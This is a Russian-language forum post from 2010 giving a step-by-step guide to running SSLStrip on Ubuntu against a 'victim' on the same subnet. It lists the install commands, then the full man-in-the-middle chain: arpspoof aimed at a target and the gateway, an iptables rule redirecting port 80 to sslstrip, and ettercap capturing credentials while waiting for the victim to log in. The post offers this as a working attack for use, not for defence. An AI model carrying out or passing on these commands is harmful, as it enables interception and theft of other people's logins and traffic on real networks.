*Drive*- Здесь рулят padonki https://drivesource.ru/ |
|
SSLStrip Шаг за Шагом на Убунту https://drivesource.ru/viewtopic.php?f=15&t=1191 |
Страница 1 из 1 |
Автор: | Padonak [ 13 дек 2010, 23:48 ] |
Заголовок сообщения: | SSLStrip Шаг за Шагом на Убунту |
SSLStrip Шаг за Шагом на Убунту В статье http://www.xakep.ru/magazine/xa/125/026/1.asp в принципе всё и понятно написано, но всё же в Убунту есть свои нюансы. Для дальнейшей работы нам необходимо: 1. SSLStrip 2. arpspoof 3. ettercap 4. ubuntu linux (пример показан на Karmic Koala 9.10) 5. сетевое подключение 6. жертва из той же подсети Скачаем SSLStrip с сайта http://www.thoughtcrime.org/software/sslstrip/ Вы скачаете архив sslstrip-0.6.tar.gz (версия может быть другая) Мы же кул хацкеры)))) и будем разархивировать через терминал! 1, Открываем терминал. 2. Заходим в папку с архивом. 3. и пишем своими ручками "tar -zxvf sslstrip-0.6.tar.gz"' 4. заходим в появившуюся папку sslstrip-0.6(всё в терминале) 5. пишем sudo python setup.py build 6. и следующая команда sudo python setup.py install Всё SSLStrip установлен. Теперь я покажу как это приблизительно выглядело у меня sagnat@sagnat-desktop:~$ ls sagnat@sagnat-desktop:~$ cd Загрузки sagnat@sagnat-desktop/Загрузки:~$ ls sagnat@sagnat-desktop/Загрузки:~$ tar -zxvf sslstrip-0.6.tar.gz sagnat@sagnat-desktop/Загрузки:~$ ls sagnat@sagnat-desktop/Загрузки:~$ cd sslstrip-0.6 sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ python setup.py build sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ sudo python setup.py install Естественно я печать всё, что происходит у меня на компе не буду ну приблизительно установка выглядит так. Что там у нас по списку?)))) Надо установить arpspoof. Это всё проще простого))) Пишем в терминале sudo apt-get install dsniff вводим пароль и всё)) Установка ettercap почти такая же: sudo apt-get install ettercap Если вы не помните свой IP введите в терминале ifconfig. Ещё вам будет нужен адрес шлюза это всё узнаётся вот ip route show | grep default | awk '{ print $3}' так. И наконец самое интересное, откройте в своём терминале 3 вкладки в одной запустите sudo arpspoof -i eth0 -t <Шлюз> -i это сетевое соединение -t это target - цель выглядит эта форма вот так: sudo arpspoof -i eth0 -t 172.168.1.4 172.168.1.1 в другой введите sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000 1000 - это прослушиваемый порт обычно ставиться на 8080 и запускаем sslstrip: sudo sslstrip ну и в третьей вкладке запускаем ettercap: sudo ettercap -Tqz Ждём когда жертва войдёт на какой-нибудь сайт. |
Автор: | Padonak [ 14 дек 2010, 01:33 ] |
Заголовок сообщения: | |
http://nnm.ru/blogs/_victor_/ptraffer_- ... na_ubuntu/ |
Страница 1 из 1 | Часовой пояс: UTC + 3 часа [ Летнее время ] |
Powered by phpBB® Forum Software © phpBB Group http://www.phpbb.com/ |